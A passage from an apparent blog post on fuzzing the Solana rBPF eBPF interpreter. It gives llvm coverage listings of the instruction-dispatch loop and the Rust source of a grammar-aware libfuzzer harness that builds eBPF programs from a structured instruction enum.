  893|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  894|     11|                    }
  895|     11|                    reg[dst] = (reg[dst] as i32 / reg[src] as i32) as u64;
  896|       |                },
  897|    346|                ebpf::OR32_IMM   =>   reg[dst] = (reg[dst] as u32             | insn.imm as u32) as u64,
  898|    351|                ebpf::OR32_REG   =>   reg[dst] = (reg[dst] as u32             | reg[src] as u32) as u64,
  899|    345|                ebpf::AND32_IMM  =>   reg[dst] = (reg[dst] as u32             & insn.imm as u32) as u64,
  900|  1.03k|                ebpf::AND32_REG  =>   reg[dst] = (reg[dst] as u32             & reg[src] as u32) as u64,
  901|      0|                ebpf::LSH32_IMM  =>   reg[dst] = (reg[dst] as u32).wrapping_shl(insn.imm as u32) as u64,
  902|    369|                ebpf::LSH32_REG  =>   reg[dst] = (reg[dst] as u32).wrapping_shl(reg[src] as u32) as u64,
  903|      0|                ebpf::RSH32_IMM  =>   reg[dst] = (reg[dst] as u32).wrapping_shr(insn.imm as u32) as u64,
  904|    346|                ebpf::RSH32_REG  =>   reg[dst] = (reg[dst] as u32).wrapping_shr(reg[src] as u32) as u64,
  905|    690|                ebpf::NEG32      => { reg[dst] = (reg[dst] as i32).wrapping_neg()                as u64; reg[dst] &= u32::MAX as u64; },
  906|    347|                ebpf::MOD32_IMM  =>   reg[dst] = (reg[dst] as u32             % insn.imm as u32) as u64,
  907|       |                ebpf::MOD32_REG  => {
  908|      4|                    if reg[src] as u32 == 0 {
  909|      2|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  910|      2|                    }
  911|      2|                                      reg[dst] = (reg[dst] as u32            % reg[src]  as u32) as u64;
  912|       |                },
  913|  1.04k|                ebpf::XOR32_IMM  =>   reg[dst] = (reg[dst] as u32            ^ insn.imm  as u32) as u64,
  914|  2.74k|                ebpf::XOR32_REG  =>   reg[dst] = (reg[dst] as u32            ^ reg[src]  as u32) as u64,
  915|    349|                ebpf::MOV32_IMM  =>   reg[dst] = insn.imm  as u32                                as u64,
  916|  1.03k|                ebpf::MOV32_REG  =>   reg[dst] = (reg[src] as u32)                               as u64,
  917|      0|                ebpf::ARSH32_IMM => { reg[dst] = (reg[dst] as i32).wrapping_shr(insn.imm as u32) as u64; reg[dst] &= u32::MAX as u64; },
  918|      2|                ebpf::ARSH32_REG => { reg[dst] = (reg[dst] as i32).wrapping_shr(reg[src] as u32) as u64; reg[dst] &= u32::MAX as u64; },
  919|      0|                ebpf::LE         => {
  920|      0|                    reg[dst] = match insn.imm {
  921|      0|                        16 => (reg[dst] as u16).to_le() as u64,
  922|      0|                        32 => (reg[dst] as u32).to_le() as u64,
  923|      0|                        64 =>  reg[dst].to_le(),
  924|       |                        _  => {
  925|      0|                            return Err(EbpfError::InvalidInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  926|       |                        }
  927|       |                    };
  928|       |                },
  929|      0|                ebpf::BE         => {
  930|      0|                    reg[dst] = match insn.imm {
  931|      0|                        16 => (reg[dst] as u16).to_be() as u64,
  932|      0|                        32 => (reg[dst] as u32).to_be() as u64,
  933|      0|                        64 =>  reg[dst].to_be(),
  934|       |                        _  => {
  935|      0|                            return Err(EbpfError::InvalidInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  936|       |                        }
  937|       |                    };
  938|       |                },
  939|       |
  940|       |                // BPF_ALU64 class
  941|    402|                ebpf::ADD64_IMM  => reg[dst] = reg[dst].wrapping_add(insn.imm as u64),
  942|    351|                ebpf::ADD64_REG  => reg[dst] = reg[dst].wrapping_add(reg[src]),
  943|  1.12k|                ebpf::SUB64_IMM  => reg[dst] = reg[dst].wrapping_sub(insn.imm as u64),
  944|    721|                ebpf::SUB64_REG  => reg[dst] = reg[dst].wrapping_sub(reg[src]),
  945|  3.06k|                ebpf::MUL64_IMM  => reg[dst] = reg[dst].wrapping_mul(insn.imm as u64),
  946|  1.71k|                ebpf::MUL64_REG  => reg[dst] = reg[dst].wrapping_mul(reg[src]),
  947|  1.39k|                ebpf::DIV64_IMM  => reg[dst] /= insn.imm as u64,
  948|       |                ebpf::DIV64_REG  => {
  949|     23|                    if reg[src] == 0 {
  950|     12|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  951|     11|                    }
  952|     11|                                    reg[dst] /= reg[src];
  953|       |                },
  954|       |                ebpf::SDIV64_IMM  => {
  955|  1.40k|                    if reg[dst] as i64 == i64::MIN && insn.imm == -1 {
                                                                    ^0
  956|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  957|  1.40k|                    }
  958|  1.40k|
  959|  1.40k|                    reg[dst] = (reg[dst] as i64 / insn.imm) as u64
  960|       |                }
  961|       |                ebpf::SDIV64_REG  => {
  962|     12|                    if reg[src] == 0 {
  963|      5|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  964|      7|                    }
  965|      7|                    if reg[dst] as i64 == i64::MIN && reg[src] as i64 == -1 {
                                                                    ^0
  966|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  967|      7|                    }
  968|      7|                    reg[dst] = (reg[dst] as i64 / reg[src] as i64) as u64;
  969|       |                },
  970|    838|                ebpf::OR64_IMM   => reg[dst] |=  insn.imm as u64,
  971|  1.37k|                ebpf::OR64_REG   => reg[dst] |=  reg[src],
  972|  2.14k|                ebpf::AND64_IMM  => reg[dst] &=  insn.imm as u64,
  973|  4.47k|                ebpf::AND64_REG  => reg[dst] &=  reg[src],
  974|      0|                ebpf::LSH64_IMM  => reg[dst] = reg[dst].wrapping_shl(insn.imm as u32),
  975|  1.73k|                ebpf::LSH64_REG  => reg[dst] = reg[dst].wrapping_shl(reg[src] as u32),
  976|      0|                ebpf::RSH64_IMM  => reg[dst] = reg[dst].wrapping_shr(insn.imm as u32),
  977|  1.03k|                ebpf::RSH64_REG  => reg[dst] = reg[dst].wrapping_shr(reg[src] as u32),
  978|  5.59k|                ebpf::NEG64      => reg[dst] = (reg[dst] as i64).wrapping_neg() as u64,
  979|  2.85k|                ebpf::MOD64_IMM  => reg[dst] %= insn.imm  as u64,
  980|       |                ebpf::MOD64_REG  => {
  981|      3|                    if reg[src] == 0 {
  982|      2|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  983|      1|                    }
  984|      1|                                    reg[dst] %= reg[src];
  985|       |                },
  986|  2.28k|                ebpf::XOR64_IMM  => reg[dst] ^= insn.imm as u64,
  987|  1.41k|                ebpf::XOR64_REG  => reg[dst] ^= reg[src],
  988|    383|                ebpf::MOV64_IMM  => reg[dst] =  insn.imm as u64,
  989|  4.24k|                ebpf::MOV64_REG  => reg[dst] =  reg[src],
  990|      0|                ebpf::ARSH64_IMM => reg[dst] = (reg[dst] as i64).wrapping_shr(insn.imm as u32) as u64,
  991|    357|                ebpf::ARSH64_REG => reg[dst] = (reg[dst] as i64).wrapping_shr(reg[src] as u32) as u64,
  992|       |
  993|       |                // BPF_JMP class
  994|  4.43k|                ebpf::JA         =>                                          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
  995|     10|                ebpf::JEQ_IMM    => if  reg[dst] == insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^0
  996|  1.36k|                ebpf::JEQ_REG    => if  reg[dst] == reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1.36k                                                        ^2
  997|  4.16k|                ebpf::JGT_IMM    => if  reg[dst] >  insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1.42k                                                        ^2.74k
  998|  1.73k|                ebpf::JGT_REG    => if  reg[dst] >  reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1.39k                                                        ^343
  999|    343|                ebpf::JGE_IMM    => if  reg[dst] >= insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^0
 1000|  2.04k|                ebpf::JGE_REG    => if  reg[dst] >= reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1.70k                                                        ^342
 1001|  2.04k|                ebpf::JLT_IMM    => if  reg[dst] <  insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^2.04k                                                        ^1
 1002|    342|                ebpf::JLT_REG    => if  reg[dst] <  reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^0
 1003|  1.02k|                ebpf::JLE_IMM    => if  reg[dst] <= insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                                                                                         ^0
 1004|  2.38k|                ebpf::JLE_REG    => if  reg[dst] <= reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^2.38k                                                        ^1
 1005|  1.76k|                ebpf::JSET_IMM   => if  reg[dst] &  insn.imm as u64 != 0     { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1.42k                                                        ^347
 1006|    686|                ebpf::JSET_REG   => if  reg[dst] &  reg[src]        != 0     { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^0
 1007|  6.48k|                ebpf::JNE_IMM    => if  reg[dst] != insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                                                                                         ^0
 1008|  2.44k|                ebpf::JNE_REG    => if  reg[dst] != reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1.40k                                                        ^1.03k
 1009|  18.1k|                ebpf::JSGT_IMM   => if  reg[dst] as i64 >   insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^17.7k                                                        ^363
 1010|  2.08k|                ebpf::JSGT_REG   => if  reg[dst] as i64 >   reg[src]  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^2.07k                                                        ^12
 1011|  14.3k|                ebpf::JSGE_IMM   => if  reg[dst] as i64 >=  insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^12.9k                                                        ^1.37k
 1012|  3.45k|                ebpf::JSGE_REG   => if  reg[dst] as i64 >=  reg[src] as i64  { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^3.44k                                                        ^12
 1013|  1.36k|                ebpf::JSLT_IMM   => if (reg[dst] as i64) <  insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1.02k                                                        ^346
 1014|      2|                ebpf::JSLT_REG   => if (reg[dst] as i64) <  reg[src] as i64  { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^0
 1015|  2.05k|                ebpf::JSLE_IMM   => if (reg[dst] as i64) <= insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^2.04k                                                        ^14
 1016|  6.83k|                ebpf::JSLE_REG   => if (reg[dst] as i64) <= reg[src] as i64  { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^6.83k                                                        ^7
 1017|       |
 1018|       |                ebpf::CALL_REG   => {
 1019|      0|                    let target_address = reg[insn.imm as usize];
 1020|      0|                    reg[ebpf::FRAME_PTR_REG] =
 1021|      0|                        self.stack.push(&reg[ebpf::FIRST_SCRATCH_REG..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS], next_pc)?;
 1022|      0|                    if target_address < self.program_vm_addr {
 1023|      0|                        return Err(EbpfError::CallOutsideTextSegment(pc + ebpf::ELF_INSN_DUMP_OFFSET, target_address / ebpf::INSN_SIZE as u64 * ebpf::INSN_SIZE as u64));
 1024|      0|                    }
 1025|      0|                    next_pc = self.check_pc(pc, (target_address - self.program_vm_addr) as usize / ebpf::INSN_SIZE)?;
 1026|       |                },
 1027|       |
 1028|       |                // Do not delegate the check to the verifier, since registered functions can be
 1029|       |                // changed after the program has been verified.
 1030|       |                ebpf::CALL_IMM => {
 1031|     22|                    let mut resolved = false;
 1032|     22|                    let (syscalls, calls) = if config.static_syscalls {
 1033|     22|                        (insn.src == 0, insn.src != 0)
 1034|       |                    } else {
 1035|      0|                        (true, true)
 1036|       |                    };
 1037|       |
 1038|     22|                    if syscalls {
 1039|      2|                        if let Some(syscall) = self.executable.get_syscall_registry().lookup_syscall(insn.imm as u32) {
                                                  ^0
 1040|      0|                            resolved = true;
 1041|      0|
 1042|      0|                            if config.enable_instruction_meter {
 1043|      0|                                let _ = instruction_meter.consume(*last_insn_count);
 1044|      0|                            }
 1045|      0|                            *last_insn_count = 0;
 1046|      0|                            let mut result: ProgramResult<E> = Ok(0);
 1047|      0|                            (unsafe { std::mem::transmute::<u64, SyscallFunction::<E, *mut u8>>(syscall.function) })(
 1048|      0|                                self.syscall_context_objects[SYSCALL_CONTEXT_OBJECTS_OFFSET + syscall.context_object_slot],
 1049|      0|                                reg[1],
 1050|      0|                                reg[2],
 1051|      0|                                reg[3],
 1052|      0|                                reg[4],
 1053|      0|                                reg[5],
 1054|      0|                                &self.memory_mapping,
 1055|      0|                                &mut result,
 1056|      0|                            );
 1057|      0|                            reg[0] = result?;
 1058|      0|                            if config.enable_instruction_meter {
 1059|      0|                                remaining_insn_count = instruction_meter.get_remaining();
 1060|      0|                            }
 1061|      2|                        }
 1062|     20|                    }
 1063|       |
 1064|     22|                    if calls {
 1065|     20|                        if let Some(target_pc) = self.executable.lookup_bpf_function(insn.imm as u32) {
                                                  ^0
 1066|      0|                            resolved = true;
 1067|       |
 1068|       |                            // make BPF to BPF call
 1069|      0|                            reg[ebpf::FRAME_PTR_REG] =
 1070|      0|                                self.stack.push(&reg[ebpf::FIRST_SCRATCH_REG..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS], next_pc)?;
 1071|      0|                            next_pc = self.check_pc(pc, target_pc)?;
 1072|     20|                        }
 1073|      2|                    }
 1074|       |
 1075|     22|                    if !resolved {
 1076|     22|                        if config.disable_unresolved_symbols_at_runtime {
 1077|      6|                            return Err(EbpfError::UnsupportedInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 1078|       |                        } else {
 1079|     16|                            self.executable.report_unresolved_symbol(pc)?;
 1080|       |                        }
 1081|      0|                    }
 1082|       |                }
 1083|       |
 1084|       |                ebpf::EXIT => {
 1085|     14|                    match self.stack.pop::<E>() {
 1086|      0|                        Ok((saved_reg, frame_ptr, ptr)) => {
 1087|      0|                            // Return from BPF to BPF call
 1088|      0|                            reg[ebpf::FIRST_SCRATCH_REG
 1089|      0|                                ..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS]
 1090|      0|                                .copy_from_slice(&saved_reg);
 1091|      0|                            reg[ebpf::FRAME_PTR_REG] = frame_ptr;
 1092|      0|                            next_pc = self.check_pc(pc, ptr)?;
 1093|       |                        }
 1094|       |                        _ => {
 1095|     14|                            return Ok(reg[0]);
 1096|       |                        }
 1097|       |                    }
 1098|       |                }
 1099|      0|                _ => return Err(EbpfError::UnsupportedInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET)),
 1100|       |            }
 1101|       |
 1102|   135k|            if config.enable_instruction_meter && *last_insn_count >= remaining_insn_count {
 1103|       |                // Use `pc + instruction_width` instead of `next_pc` here because jumps and calls don't continue at the end of this instruction
 1104|    130|                return Err(EbpfError::ExceededMaxInstructions(pc + instruction_width + ebpf::ELF_INSN_DUMP_OFFSET, initial_insn_count));
 1105|   135k|            }
 1106|       |        }
 1107|       |
 1108|    419|        Err(EbpfError::ExecutionOverrun(
 1109|    419|            next_pc + ebpf::ELF_INSN_DUMP_OFFSET,
 1110|    419|        ))
 1111|    763|    }

Unfortunately, this fuzzer doesn’t seem to achieve the coverage we expect. Several instructions are missed (note the 0 coverage on some branches of the match) and there are no jumps, calls, or other control-flow-relevant instructions. This is largely because throwing random bytes at any parser just isn’t going to be effective; most things will get caught at the verification stage, and very little will actually test the program.

We must improve this before we continue or we’ll be waiting forever for our fuzzer to find useful bugs.

At this point, we’re about two hours into development.

The smart fuzzer

eBPF is a quite simple instruction set; you can read the whole definition in just a few pages. Knowing this: why don’t we constrain our input to just these instructions? This approach is commonly called “grammar-aware” fuzzing on account of the fact that the inputs are constrained to some grammar. It is very powerful as a concept, and is used to test a variety of large targets which have strict parsing rules.

To create this grammar-aware fuzzer, I inspected the helpfully-named and provided insn_builder.rs which would allow me to create instructions. Now, all I needed to do was represent all the different instructions. By cross referencing with eBPF documentation, we can represent each possible operation in a single enum. You can see the whole grammar.rs in the rBPF repo if you wish, but the two most relevant sections are provided below.

Defining the enum that represents all instructions
#[derive(arbitrary::Arbitrary, Debug, Eq, PartialEq)]
pub enum FuzzedOp {
    Add(Source),
    Sub(Source),
    Mul(Source),
    Div(Source),
    BitOr(Source),
    BitAnd(Source),
    LeftShift(Source),
    RightShift(Source),
    Negate,
    Modulo(Source),
    BitXor(Source),
    Mov(Source),
    SRS(Source),
    SwapBytes(Endian),
    Load(MemSize),
    LoadAbs(MemSize),
    LoadInd(MemSize),
    LoadX(MemSize),
    Store(MemSize),
    StoreX(MemSize),
    Jump,
    JumpC(Cond, Source),
    Call,
    Exit,
}
Translating FuzzedOps to BpfCode
pub type FuzzProgram = Vec<FuzzedInstruction>;

pub fn make_program(prog: &FuzzProgram, arch: Arch) -> BpfCode {
    let mut code = BpfCode::default();
    for inst in prog {
        match inst.op {
            FuzzedOp::Add(src) => code
                .add(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Sub(src) => code
                .sub(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Mul(src) => code
                .mul(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Div(src) => code
                .div(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::BitOr(src) => code
                .bit_or(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::BitAnd(src) => code
                .bit_and(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::LeftShift(src) => code
                .left_shift(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::RightShift(src) => code
                .right_shift(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Negate => code
                .negate(arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Modulo(src) => code
                .modulo(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::BitXor(src) => code
                .bit_xor(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Mov(src) => code
                .mov(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::SRS(src) => code
                .signed_right_shift(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::SwapBytes(endian) => code
                .swap_bytes(endian)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Load(mem) => code
                .load(mem)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::LoadAbs(mem) => code
                .load_abs(mem)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::LoadInd(mem) => code
                .load_ind(mem)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::LoadX(mem) => code
                .load_x(mem)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Store(mem) => code
                .store(mem)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::StoreX(mem) => code
                .store_x(mem)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Jump => code
                .jump_unconditional()
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::JumpC(cond, src) => code
                .jump_conditional(cond, src)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Call => code
                .call()
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Exit => code
                .exit()
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
        };
    }
    code
}

You’ll see here that our generation doesn’t really care to ensure that instructions are valid, just that they’re in the right format. For example, we don’t verify registers, addresses, jump targets, etc.; we just slap it together and see if it works. This is to prevent over-specialisation, where our attempts to fuzz things only make “boring” inputs that don’t test cases that would normally be considered invalid.

Okay – let’s make a fuzzer with this. The only real difference here is that our input format is now changed to have our new FuzzProgram type instead of raw bytes:

#[derive(arbitrary::Arbitrary, Debug)]
struct FuzzData {
    template: ConfigTemplate,
    prog: FuzzProgram,
    mem: Vec<u8>,
    arch: Arch,
}
The whole fuzzer, though really it's not that different

This fuzzer expresses a particular stage in development. The differential fuzzer is significantly different in a few key aspects that will be discussed later.

#![feature(bench_black_box)]
#![no_main]

use std::collections::BTreeMap;
use std::hint::black_box;

use libfuzzer_sys::fuzz_target;

use grammar_aware::*;
use solana_rbpf::{
    elf::{register_bpf_function, Executable},
    insn_builder::{Arch, IntoBytes},
    memory_region::MemoryRegion,
    user_error::UserError,
    verifier::check,
    vm::{EbpfVm, SyscallRegistry, TestInstructionMeter},
};

use crate::common::ConfigTemplate;

mod common;
mod grammar_aware;

#[derive(arbitrary::Arbitrary, Debug)]
struct FuzzData {
    template: ConfigTemplate,
    prog: FuzzProgram,
    mem: Vec<u8>,
    arch: Arch,
}

fuzz_target!(|data: FuzzData| {
    let prog = make_program(&data.prog, data.arch);
    let config = data.template.into();
    if check(prog.into_bytes(), &config).is_err() {
        // verify please
        return;
    }
    let mut mem = data.mem;
    let registry = SyscallRegistry::default();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&config, &mut bpf_functions, &registry, 0, "entrypoint").unwrap();
    let executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(
        prog.into_bytes(),
        None,
        config,
        SyscallRegistry::default(),
        bpf_functions,
    )
    .unwrap();
    let mem_region = MemoryRegion::new_writable(&mem, ebpf::MM_INPUT_START);
    let mut vm =
        EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![mem_region]).unwrap();

    drop(black_box(vm.execute_program_interpreted(
        &mut TestInstructionMeter { remaining: 1 << 16 },
    )));
});

Evaluation

Let’s see how well this version covers our target now.

$ cargo +nightly fuzz run smart -- -max_total_time=60
... snip ...
#1449846	REDUCE cov: 1730 ft: 6369 corp: 1019/168Kb lim: 4096 exec/s: 4832 rss: 358Mb L: 267/2963 MS: 1 EraseBytes-
#1450798	NEW    cov: 1730 ft: 6370 corp: 1020/168Kb lim: 4096 exec/s: 4835 rss: 358Mb L: 193/2963 MS: 2 InsertByte-InsertRepeatedBytes-
#1451609	NEW    cov: 1730 ft: 6371 corp: 1021/168Kb lim: 4096 exec/s: 4838 rss: 358Mb L: 108/2963 MS: 1 ChangeByte-
#1452095	NEW    cov: 1730 ft: 6372 corp: 1022/169Kb lim: 4096 exec/s: 4840 rss: 358Mb L: 108/2963 MS: 1 ChangeByte-
#1452830	DONE   cov: 1730 ft: 6372 corp: 1022/169Kb lim: 4096 exec/s: 4826 rss: 358Mb
Done 1452830 runs in 301 second(s)

Notice that our number of inputs tried (the number farthest left) is nearly half, but our cov and ft values are significantly higher.

Let’s evaluate that coverage a little more specifically:

$ cargo +nightly fuzz coverage smart
$ rust-cov show -Xdemangler=rustfilt fuzz/target/x86_64-unknown-linux-gnu/release/smart -instr-profile=fuzz/coverage/smart/coverage.profdata -show-line-counts-or-regions -show-instantiations -name=execute_program_interpreted_inner
Command output of rust-cov

If you’re not familiar with llvm coverage output, the first column is the line number, the second column is the number of times that that particular line was hit, and the third column is the code itself.

<solana_rbpf::vm::EbpfVm<solana_rbpf::user_error::UserError, solana_rbpf::vm::TestInstructionMeter>>::execute_program_interpreted_inner:
  709|    886|    fn execute_program_interpreted_inner(
  710|    886|        &mut self,
  711|    886|        instruction_meter: &mut I,
  712|    886|        initial_insn_count: u64,
  713|    886|        last_insn_count: &mut u64,
  714|    886|    ) -> ProgramResult<E> {
  715|    886|        // R1 points to beginning of input memory, R10 to the stack of the first frame
  716|    886|        let mut reg: [u64; 11] = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, self.stack.get_frame_ptr()];
  717|    886|        reg[1] = ebpf::MM_INPUT_START;
  718|    886|
  719|    886|        // Loop on instructions
  720|    886|        let config = self.executable.get_config();
  721|    886|        let mut next_pc: usize = self.executable.get_entrypoint_instruction_offset()?;
                                                                                                  ^0
  722|    886|        let mut remaining_insn_count = initial_insn_count;
  723|  2.16M|        while (next_pc + 1) * ebpf::INSN_SIZE <= self.program.len() {
  724|  2.16M|            *last_insn_count += 1;
  725|  2.16M|            let pc = next_pc;
  726|  2.16M|            next_pc += 1;
  727|  2.16M|            let mut instruction_width = 1;
  728|  2.16M|            let mut insn = ebpf::get_insn_unchecked(self.program, pc);
  729|  2.16M|            let dst = insn.dst as usize;
  730|  2.16M|            let src = insn.src as usize;
  731|  2.16M|
  732|  2.16M|            if config.enable_instruction_tracing {
  733|      0|                let mut state = [0u64; 12];
  734|      0|                state[0..11].copy_from_slice(&reg);
  735|      0|                state[11] = pc as u64;
  736|      0|                self.tracer.trace(state);
  737|  2.16M|            }
  738|       |
  739|  2.16M|            match insn.opc {
  740|  2.16M|                _ if dst == STACK_PTR_REG && config.dynamic_stack_frames => {
  741|      6|                    match insn.opc {
  742|      2|                        ebpf::SUB64_IMM => self.stack.resize_stack(-insn.imm),
  743|      4|                        ebpf::ADD64_IMM => self.stack.resize_stack(insn.imm),
  744|       |                        _ => {
  745|       |                            #[cfg(debug_assertions)]
  746|      0|                            unreachable!("unexpected insn on r11")
  747|       |                        }
  748|       |                    }
  749|       |                }
  750|       |
  751|       |                // BPF_LD class
  752|       |                // Since this pointer is constant, and since we already know it (ebpf::MM_INPUT_START), do not
  753|       |                // bother re-fetching it, just use ebpf::MM_INPUT_START already.
  754|       |                ebpf::LD_ABS_B   => {
  755|      5|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  756|      5|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
                                      ^2
  757|      2|                    reg[0] = unsafe { *host_ptr as u64 };
  758|       |                },
  759|       |                ebpf::LD_ABS_H   =>  {
  760|      3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  761|      3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
                                      ^1
  762|      1|                    reg[0] = unsafe { *host_ptr as u64 };
  763|       |                },
  764|       |                ebpf::LD_ABS_W   => {
  765|      6|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  766|      6|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
                                      ^2
  767|      2|                    reg[0] = unsafe { *host_ptr as u64 };
  768|       |                },
  769|       |                ebpf::LD_ABS_DW  => {
  770|      4|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  771|      4|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
                                      ^1
  772|      1|                    reg[0] = unsafe { *host_ptr as u64 };
  773|       |                },
  774|       |                ebpf::LD_IND_B   => {
  775|      9|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  776|      9|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
                                      ^1
  777|      1|                    reg[0] = unsafe { *host_ptr as u64 };
  778|       |                },
  779|       |                ebpf::LD_IND_H   => {
  780|      3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  781|      3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
                                      ^1
  782|      1|                    reg[0] = unsafe { *host_ptr as u64 };
  783|       |                },
  784|       |                ebpf::LD_IND_W   => {
  785|      4|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
